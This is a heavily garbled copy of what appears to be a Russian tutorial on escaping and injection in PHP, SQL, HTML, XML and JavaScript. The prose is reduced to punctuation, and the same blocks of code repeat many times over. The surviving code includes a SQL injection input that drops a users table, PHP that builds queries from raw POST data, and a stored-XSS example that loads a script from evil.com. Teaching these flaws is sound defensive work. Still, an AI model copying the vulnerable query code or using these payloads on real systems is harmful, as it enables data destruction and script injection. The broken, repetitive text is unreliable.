<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML). ? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML). ? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML). ? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
